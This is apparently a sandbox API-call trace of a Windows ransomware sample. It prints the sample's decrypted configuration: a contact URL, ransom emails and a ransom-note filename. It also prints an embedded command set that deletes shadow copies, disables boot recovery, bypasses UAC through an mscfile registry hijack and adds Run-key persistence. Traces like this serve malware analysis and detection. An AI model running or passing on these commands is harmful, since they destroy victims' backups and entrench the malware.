[0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0099.717] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0099.719] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0099.720] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0099.721] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0099.721] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0099.857] GetACP () returned 0x4e4 [0099.857] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0099.857] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe")) returned 0x36 [0099.857] GetTickCount () returned 0x23dab [0099.857] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=15664593391) returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4b\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x64\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x7a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x76\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x64\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x44\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x38\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x73\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x34\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x76\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x63\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0099.857] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0099.857] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0099.857] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0099.858] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0099.858] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0099.858] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0099.858] LockResource (hResData=0x50d55c) returned 0x50d55c [0099.858] FreeResource (hResData=0x50d55c) returned 0 [0099.858] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0099.858] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0099.858] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0099.858] LockResource (hResData=0x50d64c) returned 0x50d64c [0099.858] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0099.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521c20, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0099.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521c20, cbMultiByte=38, lpWideCharStr=0x14fde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0099.858] FreeResource (hResData=0x50d64c) returned 0 [0099.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0099.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1521c24, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0099.858] GetCurrentThreadId () returned 0xc18 [0099.858] GetCurrentThreadId () returned 0xc18 [0099.858] GetCurrentThreadId () returned 0xc18 [0099.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bcd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0099.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bcd18, cbMultiByte=239, lpWideCharStr=0x14c2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0099.859] GetCurrentThreadId () returned 0xc18 [0099.859] GetCurrentThreadId () returned 0xc18 [0099.859] GetCurrentThreadId () returned 0xc18 [0099.859] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.859] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x14baccc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0099.859] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x14baccc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0099.859] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0099.861] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0099.862] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0099.863] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0099.864] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0099.865] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0099.865] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0099.867] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0099.868] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0099.870] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x14baccc, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0099.870] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x14baccc, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0099.870] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x14baccc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0099.870] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x14baccc, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0099.870] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0099.870] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0099.870] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0099.870] LockResource (hResData=0x50d72c) returned 0x50d72c [0099.870] FreeResource (hResData=0x50d72c) returned 0 [0099.870] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0099.870] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0099.870] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0099.870] LockResource (hResData=0x50d64c) returned 0x50d64c [0099.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521cc8, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0099.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521cc8, cbMultiByte=38, lpWideCharStr=0x14fdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0099.870] FreeResource (hResData=0x50d64c) returned 0 [0099.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0099.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1521ccc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0099.871] GetCurrentThreadId () returned 0xc18 [0099.871] GetCurrentThreadId () returned 0xc18 [0099.871] GetCurrentThreadId () returned 0xc18 [0099.871] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14c0e48, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0099.871] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14c0e48, cbMultiByte=1410, lpWideCharStr=0x14baccc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0099.871] GetCurrentThreadId () returned 0xc18 [0099.871] GetCurrentThreadId () returned 0xc18 [0099.871] GetCurrentThreadId () returned 0xc18 [0099.872] GetCurrentThread () returned 0xfffffffe [0099.872] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0099.872] GetLastError () returned 0x3f0 [0099.872] GetCurrentProcess () returned 0xffffffff [0099.872] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0099.872] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x14bee10, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x14bee10, ReturnLength=0x12fc60) returned 1 [0099.872] CloseHandle (hObject=0xb8) returned 1 [0099.872] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x7064e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0099.872] EqualSid (pSid1=0x7064e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14bee74*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0099.872] EqualSid (pSid1=0x7064e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14bee90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0099.872] EqualSid (pSid1=0x7064e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14bee9c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0099.872] GetCurrentProcess () returned 0xffffffff [0099.872] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0099.872] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0099.872] GetLastError () returned 0x7a [0099.872] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x707780 [0099.872] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x707780, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x707780, ReturnLength=0x12fc64) returned 1 [0099.872] GetSidSubAuthorityCount (pSid=0x707788*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x707789 [0099.872] GetSidSubAuthority (pSid=0x707788*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x707790 [0099.872] LocalFree (hMem=0x707780) returned 0x0 [0099.872] CloseHandle (hObject=0xb8) returned 1 [0099.872] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0099.872] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0099.873] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0099.873] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0099.873] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0099.873] 